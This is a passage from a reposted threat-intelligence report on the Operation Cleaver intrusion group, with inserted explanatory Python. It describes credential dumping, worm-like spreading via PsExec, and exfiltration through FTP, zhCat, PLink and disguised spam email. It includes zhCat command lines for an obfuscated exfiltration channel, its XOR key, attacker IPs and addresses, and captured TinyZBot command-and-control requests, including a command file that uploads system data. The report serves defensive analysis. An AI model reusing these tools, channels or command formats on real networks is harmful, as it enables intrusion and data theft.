  1557. versions of Mimikatz in their resources. When executed, they determine which version of Mimikatz to
  1558. use based on whether the computer’s version of Windows is 32-bit or 64-bit. This technique is
  1559. uncommon in malware and shows the advanced skillset of the Cleaver team. Both tools were developed
  1560. in C#.
  1561.  
  1562. [ PG-36 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1563.  
  1567.  
  1568. zhMimikatz and MimikatzWrapper (cont.)
  1569.  
  1570. In the following examples, the computer name is TheComputerName, the username of the logged in user
  1571. is TheUser, and that user’s password is ThePassword. At the time of execution, the system only has
  1572. its own credentials available and no cached network credentials.
  1573.  
  1574. zhMimikatz
  1575.  
  1576. zhMimikatz executes the correct version of Mimikatz for the current system, and parses the results
  1577. for any cached credentials.
  1578.  
  1579. [EWWW SCREENCAP!]
  1580.  
  1581. Figure 20: zhMimikatz
  1582.  
  1583. [ PG-37 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1584.  
  1588.  
  1589. MimikatzWrapper
  1590.  
  1591. Output from MimikatzWrapper is essentially the same as zhMimikatz, despite being a different Visual
  1592. Studio project.
  1593.  
  1594. [EWWW SCREENCAP!]
  1595.  
  1596. Figure 21: The MimikatzWrapper.
  1597.  
  1598. The only external difference is that MimikatzWrapper also logs these results to res.txt in the
  1599. executing directory. This can make it useful for tools like the PVZ tool chain and Csext to execute
  1600. with logged results:
  1601.  
  1602. [EWWW SCREENCAP!]
  1603.  
  1604. Figure 22: The MimikatzWrapper dumps credentials out to a file.
  1605.  
  1606. [ PG-38 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1607.  
  1611.  
  1612. PsExec Spreading
  1613.  
  1614. Once an attacker has credentials extracted from the cache, whether in hash form or in plaintext form,
  1615. PsExec can be used to run commands on any other computer which accepts those domain credentials
  1616. (PsExec itself takes a plaintext password; hashes are used via pass-the-hash tooling). Combined with
  1617. cached credential dumping, this can be used to jump from computer to computer on a compromised network.
  1618.  
  1619.  
  1620. NetC (Net Crawler)
  1621.  
  1622. Net Crawler utilizes a cached credential dumping technique along with PsExec in order to worm
  1623. throughout a network, collecting any and all credentials that it can extract from credential caches.
  1624. It can do this with both Windows Credential Editor and Mimikatz. It starts by extracting cached
  1625. credentials from the infected computer’s cache. Once this is complete, it scans a configured set of
  1626. IP addresses on the local subnet to determine which have SMB-related ports open. It then tries each
  1627. credential extracted from the cache against each SMB-enabled target in turn, a brute-force pass
  1628. that, from the defender’s side, is a burst of authentication attempts from a single source.
  1629.  
  1630. When a positive result has been achieved, it will create a copy of itself with a modified configuration
  1631. stored as a PE resource, then send and execute the copy utilizing PsExec. This copy repeats the
  1632. behavior of the original, but with already discovered credentials as well as newly discovered ones on
  1633. the newly infected host. Any credentials found are reported back to the original infection.
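The spreading loop described above (dump credentials, find SMB, try every known credential against every reachable host, recurse from each new foothold) is what makes cached credentials on workstations so dangerous. The following is an added example, not Net Crawler itself and not Cylance code: a Python model of that loop run over a constructed five-host subnet, where credential strings stand in for whatever Mimikatz or WCE would recover. The hosts, credentials and open ports are all constructed, and the helper that dumps a host's cache is a stand-in for the real tool.

```python
"""Model of the Net Crawler spreading loop: dump creds, find SMB, try every
known credential on every reachable host, recurse from each new foothold.

Added example, not Net Crawler itself and not Cylance code. Hosts,
credentials and open ports are a constructed toy network; credential strings
stand in for whatever Mimikatz / WCE would recover (hash or plaintext).
"""
from collections import deque

SMB_PORTS = {139, 445}

class Host:
    def __init__(self, ip, open_ports, accepts, cached):
        self.ip = ip
        self.open_ports = set(open_ports)  # what a port scan of this host shows
        self.accepts = set(accepts)        # credentials that give PsExec-level access
        self.cached = set(cached)          # credentials sitting in this host's cache

def dump_cached_credentials(host):
    """Stand-in for the Mimikatz / WCE step on an already compromised host."""
    return set(host.cached)

def smb_reachable(hosts, targets):
    """Stand-in for the port scan over the configured IP range."""
    return [hosts[ip] for ip in targets if ip in hosts and hosts[ip].open_ports & SMB_PORTS]

def crawl(hosts, patient_zero, targets):
    """Breadth-first spread from patient_zero.

    Returns (infected, credentials, attempts): the hosts reached in order, the
    union of every credential recovered (each copy reports back to the origin,
    so all copies share the set), and the number of logon attempts made.
    """
    known, infected, attempts = set(), [], 0
    seen, queue = {patient_zero}, deque([patient_zero])
    while queue:
        ip = queue.popleft()
        infected.append(ip)
        known |= dump_cached_credentials(hosts[ip])
        for target in smb_reachable(hosts, targets):
            if target.ip in seen:
                continue
            for cred in sorted(known):          # one logon attempt per credential
                attempts += 1
                if cred in target.accepts:      # PsExec succeeds: copy self, run it there
                    seen.add(target.ip)
                    queue.append(target.ip)
                    break
    return infected, known, attempts

def build_network(workstation_caches_service_account=True):
    """Constructed five-host subnet. The flag models one hardening choice: whether
    the backup service account's credential is left cached on the first workstation."""
    alice, svc, admin, bob = "CORP\\alice", "CORP\\svc_backup", "CORP\\Administrator", "CORP\\bob"
    ws11_cache = {svc} if workstation_caches_service_account else set()
    hosts = [
        Host("10.0.0.10", {445}, set(), {alice}),           # patient zero (phished user)
        Host("10.0.0.11", {139, 445}, {alice}, ws11_cache), # alice is local admin here
        Host("10.0.0.12", {445}, {svc}, {admin}),           # only the service account logs on
        Host("10.0.0.13", {3389}, {alice}, {admin}),        # SMB blocked: never even probed
        Host("10.0.0.14", {445}, {bob}, set()),             # needs a credential never recovered
    ]
    return {h.ip: h for h in hosts}

TARGET_RANGE = ["10.0.0.%d" % i for i in range(10, 15)]

if __name__ == "__main__":
    for cached in (True, False):
        infected, creds, tries = crawl(build_network(cached), "10.0.0.10", TARGET_RANGE)
        print("svc_backup cached on workstation=%s: infected %s, %d creds, %d logon attempts"
              % (cached, infected, len(creds), tries))
```

With the service-account credential cached on 10.0.0.11, the crawl reaches 10.0.0.12 and picks up the domain administrator credential there; with that single cache entry removed, it stops after the first hop because nothing in the bot's credential set is accepted anywhere else. The attempts counter is the defender's signal: every credential tried against a host that rejects it is a failed logon from one source in quick succession.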
  1634.  
  1635. [ PG-39 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1636.  
  1640.  
  1641. NetC (Net Crawler) cont.
  1642.  
  1643. The following is a sample of some of the recovered results of Net Crawler executing on a live network:
  1644.  
  1645. [EWWW SCREENCAP!]
  1646.  
  1647. Figure 23: The real output of a successfully run NetC effort at a victim organization.
  1648.  
  1649.  
  1650. A more in depth analysis of Net Crawler, as part of the A Study in Bots series, will be available on
  1651. Cylance’s blog.
  1652.  
  1653. [ PG-40 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1654.  
  1658.  
  1659. MS08-067 Exploit
  1660.  
  1661. MS08-067 is a vulnerability in the Windows Server service, made infamous by the Conficker worm, which
  1662. can be exploited with a specially crafted RPC request to the operating system’s RPC interface over
  1663. SMB. This vulnerability has been patched since October 2008, but many networks have failed to update
  1664. their systems even to this day.
  1665.  
  1666. Operation Cleaver used a plagiarized version of a publicly available exploit for this vulnerability
  1667. developed in Python. Someone in the Cleaver team (presumed to be Nesha) modified the exploit to read
  1668. “By Nesha”.
  1669.  
  1670. Jasus
  1671.  
  1672. Jasus is an ARP cache poisoner developed by the Operation Cleaver team. It makes use of WinPcap and
  1673. is developed in C. Compared to some other publicly available ARP cache poisoning utilities, Jasus
  1674. is poorly developed and without many useful features. The primary positive attribute of Jasus is its
  1675. poor detection ratio by the antivirus industry.
  1676.  
  1677.  
  1678. Cain & Abel
  1679.  
  1680. Cain & Abel is a publicly available toolkit, which covers a wide range of functionality that assists
  1681. attackers once they have compromised a node on a network. It has the ability to dump stored and
  1682. cached credentials, and conduct attacks like ARP cache poisoning in order to capture credentials
  1683. being transmitted on the network. It also has a remotely installable trojan named Abel, which
  1684. enables some of its functionality on a remote target.
  1685.  
  1686. We observed the Operation Cleaver team using Cain & Abel to extract credentials from caches and from
  1687. the network when they were confident that there was little to no antivirus protection on the infected target.
  1688.  
  1689.  
  1690. EXFILTRATION
  1691.  
  1692. Exfiltration is the process of moving information to an external site. In this context, it is the
  1693. process of stealing information without being detected. Operation Cleaver has a strong focus on
  1694. stealing confidential/privileged information, and they have utilized a few methods in order to
  1695. facilitate this objective.
  1696.  
  1697. [ PG-41 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1698.  
  1702.  
  1703. Anonymous FTP Servers
  1704.  
  1705. Cleaver operations observed in 2013 mainly utilized FTP servers with anonymous access enabled in
  1706. order to pilfer large quantities of information. This allowed them to use the command line FTP client
  1707. already present on their targets (ftp.exe on Windows) to upload information. This is a versatile technique
  1708. as it does not require any additional software which could be detected. These FTP servers were also observed
  1709. during the infection process, as infected computers were often instructed to download additional
  1710. files from these FTP servers, including backdoors and pivoting tools.
  1711.  
  1712. The following IP addresses hosted FTP servers that were used in the infection of targets or in the
  1713. exfiltration of information.
  1714.  
  1715.  
  1716. * 108.175.152.230 – Santa Rosa, CA, USA
  1717. * 108.175.153.158 – Santa Rosa, CA, USA
  1718. * 184.82.181.48 – Pilot Mountain, North Carolina, USA
  1719. * 203.150.224.249 - Thailand
  1720. * 64.120.208.74 - Pilot Mountain, North Carolina, USA
  1721. * 64.120.208.75 - Pilot Mountain, North Carolina, USA
  1722. * 64.120.208.76 - Pilot Mountain, North Carolina, USA
  1723. * 64.120.208.78 - Pilot Mountain, North Carolina, USA
  1724. * 66.96.252.198 - Pilot Mountain, North Carolina, USA
  1725.  
  1726. NetCat
  1727.  
  1728. NetCat is a network tool which has many valid purposes but can also be used for malicious purposes.
  1729. Its main functionality allows for a client and server communication channel, allowing for information
  1730. to be transported over the network simply. NetCat has a compile-time option (GAPING_SECURITY_HOLE,
  1731. exposed as the -e switch) that enables or disables the ability to execute a command after the
  1732. connection is established. This feature can be abused to create a reverse shell, which can be used to remotely control a target.
  1733.  
  1734. NetCat’s network communications are in plaintext, and could be viewed by an egress filter looking
  1735. to block the exfiltration of sensitive information. The Operation Cleaver team was observed attempting
  1736. to use NetCat to exfiltrate information as well as use it as a reverse connecting shell. The use of
  1737. NetCat was later replaced with zhCat.
  1738.  
  1739. [ PG-42 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1740.  
  1744.  
  1745. zhCat
  1746.  
  1747. zhCat is a tool developed by the Operation Cleaver team which operates similarly to NetCat. Its main
  1748. purpose is to create a channel that is capable of transporting information over the network. The
  1749. changes made in zhCat allow this information to be transferred with inline obfuscation and/or
  1750. encryption. This makes it more difficult to detect that privileged information is being exfiltrated.
  1751.  
  1752. The command line help (of a particular version) shows the following options:
  1753.  
  1754. [EWWW SCREENCAP!]
  1755.  
  1756.  
  1757. Multiple obfuscation/encryption methods are available. The -h argument enables HTTP mode.
  1758. This makes the traffic between zhCat instances look like benign HTTP traffic. For instance, if the
  1759. attackers set up a zhCat instance listening on port 1000 on 192.168.116.128 in HTTP mode, the client
  1760. instance of zhCat would use the following command:
  1761.  
  1762. zhcat.exe -h -p 1000 -i 192.168.116.128
  1763.  
  1764. The server instance would use the following command:
  1765.  
  1766. zhcat.exe -l -h -p 1000
  1767.  
  1768. When we run both of these, we can send information just by typing it into the terminal of the running
  1769. application. Information can be supplied by standard input.
  1770.  
  1771. [EWWW SCREENCAP!]
  1772.  
  1773.  
  1774. [ PG-43 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1775.  
  1779.  
  1780. zhCat (cont.)
  1781.  
  1782. If we observe the network communications during this transfer, we can see the following HTTP POST request.
  1783.  
  1784. [EWWW SCREENCAP!]
  1785.  
  1786. Note: research into ebizmba.com did not turn up any additional evidence of being involved with the
  1787. development of zhCat.
  1788.  
  1789. On the server side, we can see our message has been received:
  1790.  
  1791. [EWWW SCREENCAP!]
  1792.  
  1793. If stricter egress filtering is enabled, the attackers can use zhCat to also XOR the traffic with a shared
  1794. key (obfuscation rather than encryption: the key is fixed and embedded in zhCat). The key used for XOR is:
  1795.  
  1796.  
  1797. Sorry! The handle to file %s is not a valid handle any more.\nSorry!
  1798. The handle to file %s is not a valid handle any more.
  1799.  
  1800. The \n represents hex character 0x0A, which is a new line character.
  1801.  
  1802. An attacker could set up a server instance of zhCat with the following command in order to enable both
  1803. HTTP and XOR obfuscation:
  1804.  
  1805. zhcat.exe -h -p 1000 -l -x
  1806.  
  1807. The client instance could then be invoked with the following command:
  1808.  
  1809. zhcat.exe -h -p 1000 -i 192.168.116.128 -x
  1810.  
  1811. Once again, information can be supplied via standard input.
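Because the XOR key is fixed and has been recovered from the binary, a defender holding it can reverse the obfuscation on captured traffic. The following is an added example, not zhCat's code: a Python implementation of repeating-key XOR with the key printed above, an HTTP wrapper standing in for the -h mode, and an egress-side check that XORs a captured POST body with the known key and reports whether readable text falls out. The report gives the key but not the framing, so the example assumes the simplest scheme (key applied from offset 0 and repeated); the HTTP header set and the sample payload are constructed for the example.

```python
"""Repeating-key XOR as described for zhCat, plus a check that an egress
filter holding the leaked key can turn a captured POST body back into text.

Added example, not zhCat's code. The report gives the key but not the
framing, so this assumes the simplest scheme: the key bytes are XORed over
the payload from offset 0 and repeat when exhausted, and the key is exactly
the string printed in the report (the \\n being a single 0x0A byte). The HTTP
wrapper, its header set and the sample payload are constructed for the example.
"""
KEY = (b"Sorry! The handle to file %s is not a valid handle any more.\n"
       b"Sorry! The handle to file %s is not a valid handle any more.")

def xor_stream(data, key=KEY):
    """Repeating-key XOR. Applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def build_http_post(body, host="192.168.116.128", port=1000):
    """Wrap an obfuscated payload in a POST the way an HTTP-mode channel would
    (assumed header set; zhCat's real headers are in the report's screenshot)."""
    head = ("POST / HTTP/1.1\r\nHost: %s:%d\r\nContent-Type: application/octet-stream\r\n"
            "Content-Length: %d\r\n\r\n" % (host, port, len(body)))
    return head.encode("ascii") + body

def split_http(raw):
    """Return (header_block, body) from a raw HTTP message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body

def printable_ratio(data):
    """Share of bytes that are printable ASCII or tab/CR/LF."""
    ok = sum(1 for c in data if 32 <= c < 127 or c in (9, 10, 13))
    return ok / max(len(data), 1)

def try_known_key(body, key=KEY, threshold=0.95):
    """Egress-filter check: XOR the body with the known key and decide, from the
    share of printable bytes, whether that exposed text. Returns (hit, plaintext)."""
    candidate = xor_stream(body, key)
    return printable_ratio(candidate) >= threshold, candidate

# Constructed sample of the kind of record a bot might push through the channel.
SAMPLE_PLAINTEXT = (b"host=WS-0042\r\nuser=CORP\\alice\r\n"
                    b"file=C:\\Users\\alice\\Documents\\network_diagram.vsd\r\n"
                    b"bytes=184320\r\n")

if __name__ == "__main__":
    wire = build_http_post(xor_stream(SAMPLE_PLAINTEXT))
    head, body = split_http(wire)
    hit, text = try_known_key(body)
    print(head.decode("ascii"))
    print("on the wire: %.0f%% printable" % (100 * printable_ratio(body)))
    print("known key recovers text: %s\n%s" % (hit, text.decode("ascii")))
```

The printable-ratio test only works for text payloads; for exfiltrated binaries, compare the XORed body against known file signatures instead. Note also why this is obfuscation rather than encryption: zero bytes on the wire mark every position where the plaintext equals the key, and a long text stream XORed with a short repeating key is recoverable even without the key.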
  1812.  
  1813. [ PG-44 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1814.  
  1818.  
  1819. zhCat (cont.)
  1820.  
  1821.  
  1822. [EWWW SCREENCAP!]
  1823.  
  1824. Upon inspecting the network traffic again, we see the following HTTP POST request.
  1825.  
  1826. [EWWW SCREENCAP!]
  1827.  
  1828. On the server side, we can see this information being received:
  1829.  
  1830. [EWWW SCREENCAP!]
  1831.  
  1832. zhCat has a variety of other features such as port mirroring as well as traffic redirecting.
  1833.  
  1834.  
  1835. PLink
  1836.  
  1837. PLink is one of the many utilities provided in the PuTTY (SSH) suite, which has many benign purposes.
  1838. It is capable of communicating over various protocols, the most notable being SSH. The SSH protocol
  1839. is a heavily utilized encrypted protocol, most commonly used for remote administration of UNIX based
  1840. operating systems. PLink is designed to implement some of the SSH functions related to forwarding
  1841. traffic as well as other functionality.
  1842.  
  1843. Operation Cleaver uses PLink to forward RDP ports from inside the victim network out to SSH servers
  1844. they control (a reverse port forward over SSH). This lets them reach RDP servers inside the victim
  1845. network from outside while the tunnel itself looks like ordinary outbound SSH. These RDP connections
  1846. can be used to exfiltrate information visually, as well as to remotely control the computers hosting the RDP servers.
  1847.  
  1848. [ PG-45 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1849.  
  1853.  
  1854. SMTP
  1855.  
  1856. Early Cleaver operations abused SMTP in order to exfiltrate information. The sending is performed
  1857. by internally developed malware samples such as TinyZBot and Csext in order to exfiltrate information
  1858. about the infected computer, as well as requested files and keystroke logging information. Messages
  1859. were sent using an open SMTP relay at BeyondSys.com with the sender email address
  1860. dyanachear(at)beyondsys.com. This allowed the attackers to use infrastructure that was not theirs
  1861. to exfiltrate information. The known recipient addresses of this information were
  1862. testmail_00001(at)yahoo.com and TerafficAnalyzer(at)yahoo.com. In order to deceive anyone reading
  1863. these emails, the attackers made them look like a spam message that most would not think twice about.
  1864. The subject used is the following:
  1865.  
  1866. No Prescription required. Viagra Dosages: 25, 100, 150mg.
  1867. Fast worldwide delivery.
  1868.  
  1869. The message used is the following:
  1870.  
  1871. Buy Viagra150mg x 50 tablets for only $124.99!
  1872.  
  1873. No Prescription required. Viagra dosages: 150, 100, 25mg. Fast
  1874. Worldwide Delivery.
  1875.  
  1876. See the attachment movie.
  1877. Free bonus trip.
  1878. bestviagra4u.cn
  1879.  
  1880. The files being exfiltrated are added to the email as attachments.
  1881.  
  1882.  
  1883. SOAP
  1884.  
  1885. SOAP is an XML messaging protocol, normally carried over HTTP. In relation to Operation Cleaver, it is
  1886. used as the command and control protocol for TinyZBot, which was the preferred backdoor and underwent
  1887. long-term development. HTTP communications are often used by botnets, but it is uncommon for malware
  1888. to use a higher-level protocol such as SOAP. It is likely that SOAP was used because it is simple to
  1889. implement in C#, and has the added benefit of blending in with other benign HTTP traffic.
  1890.  
  1891. As part of TinyZBot’s command and control protocol, files can be exfiltrated over SOAP to the command
  1892. and control server. For more information about TinyZBot, see the Persistence section.
  1893.  
  1894. [ PG-46 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1895.  
  1899.  
  1900. PERSISTENCE
  1901.  
  1902. Persistence is the means of maintaining access to a compromised network. There are limitless methods
  1903. of persistence; the following are techniques and tools for persistence used by Cleaver.
  1904.  
  1905.  
  1906. TinyZBot
  1907.  
  1908. TinyZBot is a backdoor developed in C#. This bot is the longest developed malware we have analyzed
  1909. from this organization. The earliest known version was compiled in January 2013 and we continued to
  1910. see new versions being created actively. The purpose of TinyZBot is to gather information from an
  1911. infected computer as well as to maintain and extend access into a compromised network.
  1912.  
  1913. TinyZBot was developed with the clear intention of targeted campaigns. The name TinyZBot is assumed
  1914. to be referring to this project as a less versatile version of the ZeuS botnet, although it does not
  1915. exhibit the major browser injection features of ZeuS. To be clear, TinyZBot shares no code with ZeuS
  1916. or its variants, and is developed in a different programming language. The majority of the code in
  1917. TinyZBot was created by Cleaver.
  1918.  
  1919.  
  1920. TinyZBot Features
  1921.  
  1922. TinyZBot supports a wide array of features that continually evolved over time. For the evolution of
  1923. features, see the History section. The following is a list of supported features:
  1924.  
  1925. *       SMTP exfiltration
  1926. *       Log keystrokes
  1927. *       Monitor clipboard activity
  1928. *       Enable a SOAP-based command and control channel
  1929. *       Self-updating
  1930. *       Download and execute arbitrary code
  1931. *       Capture screenshots
  1932. *       Extract saved passwords for Internet Explorer
  1933. *       Install as a service
  1934. *       Establish persistence by shortcut in startup folder
  1935. *       Provide unique malware campaign identifiers for tracking and control purposes
  1936. *       Deceptive execution methods
  1937. *       Dynamic backdoor configuration
  1938. *       FTP exfiltration
  1939. *       Security software detection
  1940. *       Ability to disable Avira antivirus
  1941. *       Ability to modify PE resources
  1942. *       Dynamic plugin structure
  1943.  
  1944. [ PG-47 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1945.  
  1949.  
  1950. TinyZBot Command and Control Protocol
  1951.  
  1952. The command and control mechanism for TinyZBot utilizes SOAP communicating over HTTP. Potential reasons
  1953. for using SOAP are:
  1954.  
  1955. 1.      SOAP-based communications are simple to implement in C#.
  1956. 2.      SOAP traffic could easily be considered benign traffic, as it is not commonly seen in malware.
  1957.  
  1958.  
  1959. As part of SOAP communications, a namespace URI is specified. This is internal to the protocol and does
  1960. not necessarily reflect the URI of the host running the SOAP server (ASMX file). In the case of TinyZBot,
  1961. this URI is http://tempuri.org/, the placeholder namespace Visual Studio generates by default for new web services.
  1962.  
  1963. Since the first version of the SOAP-based command and control protocol was implemented, TinyZBot has used
  1964. what is referred to as a “dynamic password”: a cryptographic hash computed over the server time (which
  1965. must first be obtained through a SOAP query), the TinyZBot’s GUID, and the TinyZBot’s AppUsageID
  1966. (campaign identifier). The bot therefore cannot authenticate without first asking the server for the time.
  1967.  
  1968. In the command and control examples below, the request is TCP data sent by the TinyZBot infection
  1969. and the response is TCP data sent back by the command and control server (the original report colored
  1970. them red and blue). The server time lookup query invokes the SOAP command GetServerTime.
  1971.  
  1972. POST /checkupdate.asmx HTTP/1.1
  1973. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  1974. Content-Type: text/xml; charset=utf-8
  1975. SOAPAction: "http://tempuri(dot)org/GetServerTime"
  1976. Host: microsoftactiveservices(dot)com
  1977. Content-Length: 291
  1978. Expect: 100-continue
  1979. Connection: Keep-Alive
  1980.  
  1981. HTTP/1.1 100 Continue
  1982. <?xml version="1.0" encoding="utf-8"?><soap:Envelope
  1983. xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
  1984. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  1985. xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><GetServerTime xmlns="http://tempuri.org/" />
  1986. </soap:Body></soap:Envelope>
  1987.  
  1988. HTTP/1.1 200 OK
  1989. Cache-Control: private, max-age=0
  1990. Content-Type: text/xml; charset=utf-8
  1991. Server: Microsoft-IIS/7.5
  1992. X-AspNet-Version: 2.0.50727
  1993. X-Powered-By: ASP.NET
  1994. Date: Mon, 06 Oct 2014 13:36:47 GMT
  1995. Content-Length: 392
  1996.  
  1997. [ PG-48 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1998.  
  1999.  
  2000.  
  2001. [CYLANCE                                                                                  #OPCLEAVER]
  2002.  
2005. <?xml version="1.0" encoding="utf-8"?><soap:Envelope
2006. xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
2007. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2008. xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><GetServerTimeResponse xmlns="http://tempuri.org/">
2009. <GetServerTimeResult>2014-10-06T13:36:47.2193601Z</GetServerTimeResult>
2010. </GetServerTimeResponse></soap:Body></soap:Envelope>
  2011.  
  2012. This is the first query done by a running TinyZBot instance, and needs to be done shortly before
  2013. most other queries, in order to update the dynamic password.
  2014.  
  2015. Commands, updates and files to drop and execute are stored as files on the SOAP server, and access
  2016. is restricted by the AppUsageID as well as the bot GUID. This allows for commands to be sent to
  2017. all bots for a campaign as well as individual control. The TinyZBot queries the server in order
  2018. to enumerate all files currently available to it.
  2019.  
  2020. POST /checkupdate.asmx HTTP/1.1
  2021. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  2022. Content-Type: text/xml; charset=utf-8
2023. SOAPAction: "http://tempuri(dot)org/GetFileList"
  2024. Host: microsoftactiveservices(dot)com
  2025. Content-Length: 425
  2026. Expect: 100-continue
  2027.  
  2028. HTTP/1.1 100 Continue
2029. <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
2030. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
2031. <soap:Body><GetFileList xmlns="http://tempuri(dot)org/"><Id>00cf6217-8c7e-4598-b155-65ebd949bba9</Id>
2032. <AppType>XYZCO</AppType><IP /><Pass>abefc81</Pass><Version>BDFF;1.0.0</Version>
2033. </GetFileList></soap:Body></soap:Envelope>
2034.  
2035. HTTP/1.1 200 OK
2036. Cache-Control: private, max-age=0
2037. Content-Type: text/xml; charset=utf-8
2038. Server: Microsoft-IIS/7.5
2039. X-AspNet-Version: 2.0.50727
2040. X-Powered-By: ASP.NET
2041. Date: Mon, 06 Oct 2014 13:36:47 GMT
2042. Content-Length: 1474
2043.  
2044. <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
2045. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
2046. <soap:Body><GetFileListResponse xmlns="http://tempuri.org/">
  2055. <GetFileListResult><string>[ALL] b93c-49a1-140914084450 [0000000000000000000000000000
  2056. 0000].tmu</string><string>[ALL]  b93c-49a1-140914084612  [0000000000000000000000000000
  2057. 0000].tmu</string><string>[ALL]  b93c-49a1-140914084619  [00000000000000000000000000000
  2058. 000].tmu</string><string>[ALL]  b93c-49a1-140914084628  [00000000000000000000000000000
  2059. 000].tmu</string><string>[ALL]  b93c-49a1-140914084638  [00000000000000000000000000000
  2060. 000].tmu</string><string>[ALL]  b93c-49a1-140914084644  [00000000000000000000000000000
  2061. 000].tmu</string><string>[ALL]  b93c-49a1-140914084659  [000000000000000000000000000000
  2062. 00].tmu</string><string>[ALL]  b93c-49a1-140914084715  [0000000000000000000000000000000
  2063. 0].tmu</string><string>[ALL]  b93c-49a1-140914084732  [00000000000000000000000000000000
  2064. ].tmu</string><string>[ALL]  b93c-49a1-140914084741  [00000000000000000000000000000000].
  2065. tmu</string><string>[ALL]  b93c-49a1-140914090807  [00000000000000000000000000000000].tmu</
  2066. string><string>[ALL]  b93c-49a1-140915103605  [00000000000000000000000000000000].tmu</
  2067. string><string>[ALL]  b93c-49a1-140915103610  [00000000000000000000000000000000].tmu</string></
  2068. GetFileListResult></GetFileListResponse></soap:Body></soap:Envelope>
  2069.  
  2070. In order to download the file and parse for commands to execute, the TinyZBot must request the file.
  2071. The file is downloaded Base64-encoded inside of the SOAP response.
  2072.  
2073. POST /checkupdate.asmx HTTP/1.1
2074. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
2075. Content-Type: text/xml; charset=utf-8
2076. SOAPAction: "http://tempuri(dot)org/GetFile"
2077. Host: microsoftactiveservices(dot)com
2078. Content-Length: 478
2079. Expect: 100-continue
2080.  
2081. HTTP/1.1 100 Continue
2082.  
2083. <?xml version="1.0" encoding="utf-8"?>
2084. <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
2085. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2086. xmlns:xsd="http://www.w3.org/2001/XMLSchema">
2087. <soap:Body><GetFile xmlns="http://tempuri(dot)org/"><Id>00cf6217-8c7e-4598-b155-65ebd949bba9</Id>
2088. <AppType>XYZCO</AppType><IP /><Pass>abefc81</Pass>
2089. <FileName>[ALL] b93c-49a1-140914084450 [00000000000000000000000000000000].tmu</FileName>
2090. </GetFile></soap:Body></soap:Envelope>
  2091.  
2092. HTTP/1.1 200 OK
2093. Cache-Control: private, max-age=0
2094. Content-Type: text/xml; charset=utf-8
2095. Server: Microsoft-IIS/7.5
2096. X-AspNet-Version: 2.0.50727
2097. X-Powered-By: ASP.NET
2098. Date: Mon, 06 Oct 2014 13:36:47 GMT
2099. Content-Length: 652
2100.  
2101. <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
2102. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
2103. <soap:Body><GetFileResponse xmlns="http://tempuri(dot)org/">
  2104. <GetFileResult>OzIwMTQwOTE0X18wODQ0NTANClJVTkNNRD1jbWQuZXhlLC9DIGlwY29uZmlnIC9hbGwgP
  2105. j4gIltJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dCIgMj4mMQ0KV
  2106. VBMT0FEPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA0KREVMR
  2107. VRFPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA==
  2108. </GetFileResult></GetFileResponse></soap:Body></soap:Envelope>
  2109.  
  2118. The command file downloaded in this example is as follows:
  2119.  
2120. ;20140914__084450
2121. RUNCMD=cmd.exe,/C ipconfig /all >> "[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt" 2>&1
  2122. UPLOAD=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
  2123. DELETE=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
  2124.  
  2125. The first line is a timestamp of the command. The TinyZBot command parser ignores it. The RUNCMD
  2126. line requests that cmd.exe be executed, with the command ipconfig /all being redirected to a file
  2127. in a directory designated for files to be uploaded. The UPLOAD command requests that this file
  2128. is then uploaded over SOAP to the command and control server. The DELETE command then requests
